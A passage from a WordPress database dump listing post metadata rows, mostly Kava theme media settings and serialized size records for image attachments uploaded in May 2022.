,'kava_extra_audio_autoplay','false'),(32469,4663,'kava_extra_audio_preload','false'),(32470,4663,'video_tab',''),(32471,4663,'kava_extra_video_type','library'),(32472,4663,'kava_extra_video_library',''),(32473,4663,'kava_extra_video_external',''),(32474,4663,'kava_extra_video_poster',''),(32475,4663,'kava_extra_video_width','770'),(32476,4663,'kava_extra_video_height','480'),(32477,4663,'kava_extra_video_loop','false'),(32478,4663,'kava_extra_video_autoplay','false'),(32479,4663,'kava_extra_video_preload','false'),(32482,4668,'_edit_lock','1652095297:42'),(32483,4668,'_last_editor_used_jetpack','block-editor'),(32484,4669,'_wp_attached_file','2022/05/image.png'),(32485,4669,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:564;s:6:\"height\";i:312;s:4:\"file\";s:17:\"2022/05/image.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"image-300x166.png\";s:5:\"width\";i:300;s:6:\"height\";i:166;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"image-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"image-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"image-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"image-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"image-400x312.png\";s:5:\"width\";i:400;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"image-370x312.png\";s:5:\"width\";i:370;s:6:\"height\";i:312;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32488,4668,'_edit_last','42'),(32489,4668,'kava_extra_enable_breadcrumbs','inherit'),(32490,4668,'post_formats',''),(32491,4668,'gallery_tab',''),(32492,4668,'kava_extra_gallery_images',''),(32493,4668,'link_tab',''),(32494,4668,'kava_extra_link',''),(32495,4668,'kava_extra_link_target','_blank'),(32496,4668,'quote_tab',''),(32497,4668,'kava_extra_quote_text',''),(32498,4668,'kava_extra_quote_cite',''),(32499,4668,'audio_tab',''),(32500,4668,'kava_extra_audio',''),(32501,4668,'kava_extra_audio_loop','false'),(32502,4668,'kava_extra_audio_autoplay','false'),(32503,4668,'kava_extra_audio_preload','false'),(32504,4668,'video_tab',''),(32505,4668,'kava_extra_video_type','library'),(32506,4668,'kava_extra_video_library',''),(32507,4668,'kava_extra_video_external',''),(32508,4668,'kava_extra_video_poster',''),(32509,4668,'kava_extra_video_width','770'),(32510,4668,'kava_extra_video_height','480'),(32511,4668,'kava_extra_video_loop','false'),(32512,4668,'kava_extra_video_autoplay','false'),(32513,4668,'kava_extra_video_preload','false'),(32516,4672,'_wp_attached_file','2022/05/epa-board-chair.png'),(32517,4672,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:27:\"2022/05/epa-board-chair.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:26:\"epa-board-chair-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:27:\"epa-board-chair-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32520,4668,'_thumbnail_id','4672'),(32521,4674,'_edit_lock','1652095773:42'),(32522,4674,'_last_editor_used_jetpack','block-editor'),(32523,4675,'_wp_attached_file','2022/05/vessel.png'),(32524,4675,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:18:\"2022/05/vessel.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"vessel-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"vessel-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"vessel-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"vessel-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"vessel-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"vessel-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"vessel-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:18:\"vessel-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"vessel-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:18:\"vessel-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:18:\"vessel-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32527,4674,'_wp_old_date','2022-05-09'),(32528,4674,'_thumbnail_id','4675'),(32529,4674,'_edit_last','42'),(32530,4674,'kava_extra_enable_breadcrumbs','inherit'),(32531,4674,'post_formats',''),(32532,4674,'gallery_tab',''),(32533,4674,'kava_extra_gallery_images',''),(32534,4674,'link_tab',''),(32535,4674,'kava_extra_link',''),(32536,4674,'kava_extra_link_target','_blank'),(32537,4674,'quote_tab',''),(32538,4674,'kava_extra_quote_text',''),(32539,4674,'kava_extra_quote_cite',''),(32540,4674,'audio_tab',''),(32541,4674,'kava_extra_audio',''),(32542,4674,'kava_extra_audio_loop','false'),(32543,4674,'kava_extra_audio_autoplay','false'),(32544,4674,'kava_extra_audio_preload','false'),(32545,4674,'video_tab',''),(32546,4674,'kava_extra_video_type','library'),(32547,4674,'kava_extra_video_library',''),(32548,4674,'kava_extra_video_external',''),(32549,4674,'kava_extra_video_poster',''),(32550,4674,'kava_extra_video_width','770'),(32551,4674,'kava_extra_video_height','480'),(32552,4674,'kava_extra_video_loop','false'),(32553,4674,'kava_extra_video_autoplay','false'),(32554,4674,'kava_extra_video_preload','false'),(32555,4677,'_edit_lock','1652096361:42'),(32556,4677,'_last_editor_used_jetpack','block-editor'),(32557,4678,'_wp_attached_file','2022/05/Stockholm-50-.png'),(32558,4678,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2022/05/Stockholm-50-.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"Stockholm-50--150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:25:\"Stockholm-50--640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32561,4677,'_wp_old_date','2022-05-09'),(32562,4677,'_thumbnail_id','4678'),(32563,4677,'_edit_last','42'),(32564,4677,'kava_extra_enable_breadcrumbs','inherit'),(32565,4677,'post_formats',''),(32566,4677,'gallery_tab',''),(32567,4677,'kava_extra_gallery_images',''),(32568,4677,'link_tab',''),(32569,4677,'kava_extra_link',''),(32570,4677,'kava_extra_link_target','_blank'),(32571,4677,'quote_tab',''),(32572,4677,'kava_extra_quote_text',''),(32573,4677,'kava_extra_quote_cite',''),(32574,4677,'audio_tab',''),(32575,4677,'kava_extra_audio',''),(32576,4677,'kava_extra_audio_loop','false'),(32577,4677,'kava_extra_audio_autoplay','false'),(32578,4677,'kava_extra_audio_preload','false'),(32579,4677,'video_tab',''),(32580,4677,'kava_extra_video_type','library'),(32581,4677,'kava_extra_video_library',''),(32582,4677,'kava_extra_video_external',''),(32583,4677,'kava_extra_video_poster',''),(32584,4677,'kava_extra_video_width','770'),(32585,4677,'kava_extra_video_height','480'),(32586,4677,'kava_extra_video_loop','false'),(32587,4677,'kava_extra_video_autoplay','false'),(32588,4677,'kava_extra_video_preload','false'),(32591,4681,'_edit_lock','1652097327:42'),(32592,4681,'_last_editor_used_jetpack','block-editor'),(32593,4682,'_wp_attached_file','2022/05/stockholm-grand-bassa.png'),(32594,4682,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:33:\"2022/05/stockholm-grand-bassa.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:32:\"stockholm-grand-bassa-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:33:\"stockholm-grand-bassa-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32597,4681,'_wp_old_date','2022-05-09'),(32598,4681,'_thumbnail_id','4682'),(32599,4681,'_edit_last','42'),(32600,4681,'kava_extra_enable_breadcrumbs','inherit'),(32601,4681,'post_formats',''),(32602,4681,'gallery_tab',''),(32603,4681,'kava_extra_gallery_images',''),(32604,4681,'link_tab',''),(32605,4681,'kava_extra_link',''),(32606,4681,'kava_extra_link_target','_blank'),(32607,4681,'quote_tab',''),(32608,4681,'kava_extra_quote_text',''),(32609,4681,'kava_extra_quote_cite',''),(32610,4681,'audio_tab',''),(32611,4681,'kava_extra_audio',''),(32612,4681,'kava_extra_audio_loop','false'),(32613,4681,'kava_extra_audio_autoplay','false'),(32614,4681,'kava_extra_audio_preload','false'),(32615,4681,'video_tab',''),(32616,4681,'kava_extra_video_type','library'),(32617,4681,'kava_extra_video_library',''),(32618,4681,'kava_extra_video_external',''),(32619,4681,'kava_extra_video_poster',''),(32620,4681,'kava_extra_video_width','770'),(32621,4681,'kava_extra_video_height','480'),(32622,4681,'kava_extra_video_loop','false'),(32623,4681,'kava_extra_video_autoplay','false'),(32624,4681,'kava_extra_video_preload','false'),(32627,4685,'_edit_lock','1652097860:42'),(32628,4685,'_last_editor_used_jetpack','block-editor'),(32629,4686,'_wp_attached_file','2022/05/Stockholm-Nimba-County.png'),(32630,4686,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:34:\"2022/05/Stockholm-Nimba-County.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:33:\"Stockholm-Nimba-County-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:34:\"Stockholm-Nimba-County-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32633,4685,'_thumbnail_id','4686'),(32634,4685,'_edit_last','42'),(32635,4685,'kava_extra_enable_breadcrumbs','inherit'),(32636,4685,'post_formats',''),(32637,4685,'gallery_tab',''),(32638,4685,'kava_extra_gallery_images',''),(32639,4685,'link_tab',''),(32640,4685,'kava_extra_link',''),(32641,4685,'kava_extra_link_target','_blank'),(32642,4685,'quote_tab',''),(32643,4685,'kava_extra_quote_text',''),(32644,4685,'kava_extra_quote_cite',''),(32645,4685,'audio_tab',''),(32646,4685,'kava_extra_audio',''),(32647,4685,'kava_extra_audio_loop','false'),(32648,4685,'kava_extra_audio_autoplay','false'),(32649,4685,'kava_extra_audio_preload','false'),(32650,4685,'video_tab',''),(32651,4685,'kava_extra_video_type','library'),(32652,4685,'kava_extra_video_library',''),(32653,4685,'kava_extra_video_external',''),(32654,4685,'kava_extra_video_poster',''),(32655,4685,'kava_extra_video_width','770'),(32656,4685,'kava_extra_video_height','480'),(32657,4685,'kava_extra_video_loop','false'),(32658,4685,'kava_extra_video_autoplay','false'),(32659,4685,'kava_extra_video_preload','false'),(32662,4685,'_wp_old_date','2022-05-09'),(32663,4688,'_edit_lock','1652098245:42'),(32664,4688,'_last_editor_used_jetpack','block-editor'),(32665,4689,'_wp_attached_file','2022/05/EPA.png'),(32666,4689,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:15:\"2022/05/EPA.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"EPA-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"EPA-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"EPA-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:15:\"EPA-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:14:\"EPA-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:15:\"EPA-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:15:\"EPA-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:15:\"EPA-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:15:\"EPA-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:15:\"EPA-600x311.png\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:15:\"EPA-640x530.png\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(32669,4688,'_wp_old_date','2022-05-09'),(32670,4688,'_thumbnail_id','4689'),(32671,4688,'_edit_last','42'),(32674,4688,'kava_extra_enable_breadcrumbs','inherit'),(32675,4688,'post_formats',''),(32676,4688,'gallery_tab',''),(32677,4688,'kava_extra_gallery_images',''),(32678,4688,'link_tab',''),(32679,4688,'kava_extra_link',''),(32680,4688,'kava_extra_link_target','_blank'),(32681,4688,'quote_tab',''),(32682,4688,'kava_extra_quote_text',''),(32683,4688,'kava_extra_quote_cite',''),(32684,4688,'audio_tab',''),(32685,4688,'kava_extra_audio',''),(32686,4688,'kava_extra_audio_loop','false'),(32687,4688,'kava_extra_audio_autoplay','false'),(32688,4688,'kava_extra_audio_preload','false'),(32689,4688,'video_tab',''),(32690,4688,'kava_extra_video_type','library'),(32691,4688,'kava_extra_video_library',''),(32692,4688,'kava_extra_video_external',''),(32693,4688,'kava_extra_video_poster',''),(32694,4688,'kava_extra_video_width','770'),(32695,4688,'kava_extra_video_height','480'),(32696,4688,'kava_extra_video_loop','false'),(32697,4688,'kava_extra_video_autoplay','false'),(32698,4688,'kava_extra_video_preload','false'),(32699,4691,'_edit_lock','1652098597:42'),(32700,4691,'_last_editor_used_jetpack','block-editor'),(32701,4692,'_wp_attached_file','2022/05/Joint-meeting.png'),(32702,4692,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2022/05/Joint-meeting.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-300x155.png\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-768x398.png\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:24:\"Joint-meeting-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:25:\"Joint-meeting-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"